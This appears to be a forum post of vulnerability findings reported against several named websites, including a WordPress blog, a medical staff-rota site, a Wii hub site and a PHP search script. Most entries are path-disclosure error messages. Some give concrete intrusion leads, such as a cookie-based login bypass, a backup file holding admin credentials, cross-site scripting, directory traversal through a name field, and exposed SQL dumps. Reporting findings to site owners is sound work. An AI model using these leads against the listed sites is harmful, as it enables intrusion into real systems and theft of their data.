Full Path Disclosure:
http://www.osflv.com/wp-content/plugins/stats.php
Fatal error: Call to undefined function register_activation_hook() in /home/osflv/public_html/wp-content/plugins/stats.php on line 387Full Path Disclosure:
http://www.osflv.com/wp-content/plugins/akismet/akismet.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-content/plugins/akismet/akismet.php on line 25Full Path Disclosure:
http://www.osflv.com/wp-content/plugins/buy-me-beer/buy-me-beer-admin.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-content/plugins/buy-me-beer/buy-me-beer-admin.php on line 198Full Path Disclosure:
http://www.osflv.com/wp-content/plugins/buy-me-beer/buy-me-beer.php
Fatal error: Call to undefined function load_plugin_textdomain() in /home/osflv/public_html/wp-content/plugins/buy-me-beer/buy-me-beer.php on line 11Full Path Disclosure:
http://www.osflv.com/wp-content/plugins/headmeta/headmeta.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-content/plugins/headmeta/headmeta.php on line 82Full Path Disclosure:
http://www.osflv.com/wp-includes/bookmark.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/bookmark.php on line 227Full Path Disclosure:
http://www.osflv.com/wp-includes/canonical.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/canonical.php on line 199Full Path Disclosure:
http://www.osflv.com/wp-includes/default-filters.php
Fatal error: Call to undefined function add_filter() in /home/osflv/public_html/wp-includes/default-filters.php on line 8Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-atom-comments.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-atom-comments.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-atom.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-atom.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-rdf.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-rdf.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-rss.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-rss.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-rss2-comments.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-rss2-comments.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/feed-rss2.php
Fatal error: Call to undefined function get_option() in /home/osflv/public_html/wp-includes/feed-rss2.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/general-template.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/general-template.php on line 679Full Path Disclosure:
http://www.osflv.com/wp-includes/kses.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/kses.php on line 740Full Path Disclosure:
http://www.osflv.com/wp-includes/registration-functions.php
Warning: require_once(ABSPATHWPINC/registration.php) [function.require-once]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-includes/registration-functions.php on line 3Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHWPINC/registration.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/osflv/public_html/wp-includes/registration-functions.php on line 3
Full Path Disclosure:
http://www.osflv.com/wp-includes/rss-functions.php
Warning: require_once(ABSPATHWPINC/rss.php) [function.require-once]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-includes/rss-functions.php on line 3Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHWPINC/rss.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/osflv/public_html/wp-includes/rss-functions.php on line 3
Full Path Disclosure:
http://www.osflv.com/wp-includes/rss.php
Fatal error: Call to undefined function do_action() in /home/osflv/public_html/wp-includes/rss.php on line 2Full Path Disclosure:
http://www.osflv.com/wp-includes/script-loader.php
Fatal error: Call to undefined function add_filter() in /home/osflv/public_html/wp-includes/script-loader.php on line 442Full Path Disclosure:
http://www.osflv.com/wp-includes/template-loader.php
Fatal error: Call to undefined function is_robots() in /home/osflv/public_html/wp-includes/template-loader.php on line 64Full Path Disclosure:
http://www.osflv.com/wp-includes/update.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/update.php on line 52Full Path Disclosure:
http://www.osflv.com/wp-includes/vars.php
Fatal error: Call to undefined function is_admin() in /home/osflv/public_html/wp-includes/vars.php on line 4Full Path Disclosure:
http://www.osflv.com/wp-includes/widgets.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-includes/widgets.php on line 841Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/admin.php
Warning: require_once(ABSPATHwp-admin/includes/bookmark.php) [function.require-once]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-admin/includes/admin.php on line 3Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHwp-admin/includes/bookmark.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/osflv/public_html/wp-admin/includes/admin.php on line 3
Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/file.php
Fatal error: Call to undefined function __() in /home/osflv/public_html/wp-admin/includes/file.php on line 3Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/misc.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-admin/includes/misc.php on line 146Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/schema.php
Warning: mysql_get_server_info() [function.mysql-get-server-info]: Access denied for user 'osflv'@'localhost' (using password: NO) in /home/osflv/public_html/wp-admin/includes/schema.php on line 6Warning: mysql_get_server_info() [function.mysql-get-server-info]: A link to the server could not be established in /home/osflv/public_html/wp-admin/includes/schema.php on line 6
Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/template.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-admin/includes/template.php on line 513Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/update.php
Fatal error: Call to undefined function add_filter() in /home/osflv/public_html/wp-admin/includes/update.php on line 26Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/upgrade.php
Warning: require_once(ABSPATHwp-admin/includes/admin.php) [function.require-once]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-admin/includes/upgrade.php on line 5Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHwp-admin/includes/admin.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/osflv/public_html/wp-admin/includes/upgrade.php on line 5
Full Path Disclosure:
http://www.osflv.com/wp-admin/includes/upload.php
Fatal error: Call to undefined function add_action() in /home/osflv/public_html/wp-admin/includes/upload.php on line 280Insecure Cookie:
You shouldn't put the username in the cookie.
PHP Source Code Disclosure:
http://www.osflv.com/wp-content/plugins/buy-me-beer/readme.txt
User Enumeration:
User Enumeration:
-
Full Path Disclosure:
There is Full Path Disclosure when you log in.
Warning: Cannot modify header information - headers already sent by (output started at /home/9/d/a/1167/1167/public_html/ipAddresses.php:2) in /home/9/d/a/1167/1167/public_html/top.phpFull Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/cal.php?mon[]
Fatal error: Unsupported operand types in /home/9/d/a/1167/1167/public_html/cal.php on line 13Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/adminModual.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/adminModual.php on line 4Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/callLog.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/callLog.php on line 4Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/holidayRota.php
Warning: mysql_query(): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /home/9/d/a/1167/1167/public_html/holidayRota.php on line 7Warning: mysql_query(): A link to the server could not be established in /home/9/d/a/1167/1167/public_html/holidayRota.php on line 7
Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/nav.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/nav.php on line 11Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/left.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/nav.php on line 11Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/right.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/right.php on line 2Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/rota.php
Warning: mysql_query(): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /home/9/d/a/1167/1167/public_html/rota.php on line 13Warning: mysql_query(): A link to the server could not be established in /home/9/d/a/1167/1167/public_html/rota.php on line 13
Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/viewRequestedShifts.php
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/9/d/a/1167/1167/public_html/viewRequestedShifts.php on line 21Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/9/d/a/1167/1167/public_html/viewRequestedShifts.php on line 25
Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/shiftReportModual.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/shiftReportModual.php on line 4Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/shifts.php
Fatal error: Call to undefined function: validate() in /home/9/d/a/1167/1167/public_html/shifts.php on line 4Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/viewServices.php?s[]
Fatal error: Unsupported operand types in /home/9/d/a/1167/1167/public_html/pages.php on line 39Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/viewServices.php?s=-1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/9/d/a/1167/1167/public_html/viewServices.php on line 17Full Path Disclosure:
http://www.eastlancsmedicalservices.co.uk/pages.php
Warning: mysql_query(): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /home/9/d/a/1167/1167/public_html/pages.php on line 14Warning: mysql_query(): A link to the server could not be established in /home/9/d/a/1167/1167/public_html/pages.php on line 14
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/9/d/a/1167/1167/public_html/pages.php on line 15
You can log in if you set the user cookie to a user id.
SQL Error:
http://www.eastlancsmedicalservices.co.uk/edit4weekRota.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY _weeknumber.weekID ASC, _daysoftheweek.Priorty A -
Admin Access:
http://www.wiicharged.com/hubs/hubs(backup).html contains your username and password.
Cross Site Scripting:
There is Cross Site Scripting if the hub name contains ">code.
Directory Transversal:
There is Directory Transversal if the hub name contains ../
Full Path Disclosure:
http://www.wiicharged.com/hubchat/hubex/shout.php
Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/hubex/shout.php:4) in /home/wiicharg/public_html/hubchat/hubex/shout.php on line 9Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/hubex/shout.php:4) in /home/wiicharg/public_html/hubchat/hubex/shout.php on line 10
Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/hubex/shout.php:4) in /home/wiicharg/public_html/hubchat/hubex/shout.php on line 11
Full Path Disclosure:
http://www.wiicharged.com/hubchat/insert.php
Warning: mkdir() [function.mkdir]: File exists in /home/wiicharg/public_html/hubchat/insert.php on line 6Full Path Disclosure:
http://www.wiicharged.com/hubchat/shout.php
Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/shout.php:4) in /home/wiicharg/public_html/hubchat/shout.php on line 9Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/shout.php:4) in /home/wiicharg/public_html/hubchat/shout.php on line 10
Warning: Cannot modify header information - headers already sent by (output started at /home/wiicharg/public_html/hubchat/shout.php:4) in /home/wiicharg/public_html/hubchat/shout.php on line 11
Full Path Disclosure:
http://www.wiicharged.com/hubchat/test.php
Warning: mkdir() [function.mkdir]: File exists in /home/wiicharg/public_html/hubchat/test.php on line 3Full Path Disclosure:
http://www.wiicharged.com/hubs/table.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'hub'@'localhost' (using password: YES) in /home/wiicharg/public_html/hubs/table.php on line 6Full Path Disclosure:
http://www.wiicharged.com/hubs/put.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'wiicharg_smf2'@'localhost' (using password: YES) in /home/wiicharg/public_html/hubs/put.php on line 3Access denied for user 'wiicharg_smf2'@'localhost' (using password: YES)
Full Path Disclosure:
http://www.wiicharged.com/hubs/insert.php
Warning: mkdir() [function.mkdir]: File exists in /home/wiicharg/public_html/hubs/insert.php on line 6Full Path Disclosure:
http://www.wiicharged.com/hubs/database.php
Error creating database: Access denied for user 'wiicharg_hubs'@'localhost' to database 'my_db'PHP Source Code Disclosure:
http://www.wiicharged.com/hubs/hubs(backup).html
PHP Source Code Disclosure:
http://www.wiicharged.com/hubchat/shoutfile.txt
User Enumeration:
http://www.wiicharged.com/~root
User Enumeration:
http://www.wiicharged.com/~wiicharg
You can create folders in http://www.wiicharged.com/hubchat/ if the hub name is set to the folder name.
You can create folders in any directory if the hub name is set to ../foldername.
You can create txt files in http://www.wiicharged.com/hub/ on http://www.wiicharged.com/hubs/1.php
PHP Search PRO
in Beta Test Your Stuff!
Posted
Array:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/index.php?search_text[]
Cross Site Scripting:
There is Cross Site Scripting on http://www.hawkenterprises.org/dev/phpsearchpro/admin/editlisting.php if the fields contain code.
Cross Site Scripting:
There is Cross Site Scripting on http://www.hawkenterprises.org/dev/phpsearchpro/entryform.php if the fields contain code.
Full Path Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/generatedata.php
Full Path Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/index.php
Full Path Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/editlisting.php
Full Path Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/search.php
Full Path Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/search.php
PHP Source Code Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/phpsearchpro.zip
PHP Source Code Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/results_stub.tpl
PHP Source Code Disclosure:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/results.tpl
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/database.sql
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/search.php
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/phpsearchpro.zip
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/results.php?search_text
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/search.php
SQL Dump:
There is an SQL Dump on http://www.hawkenterprises.org/dev/phpsearchpro/admin/editlisting.php if you submit the form.
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/index.php
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/admin/editlisting.php
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/dbcreds.php
SQL Dump:
http://www.hawkenterprises.org/dev/phpsearchpro/generatedata.php
SQL Dump:
There is an SQL Dump on http://www.hawkenterprises.org/dev/phpsearchpro/entryform.php if you submit the form.
User Enumeration:
http://www.hawkenterprises.org/~gerra0
User Enumeration:
http://www.hawkenterprises.org/~nobody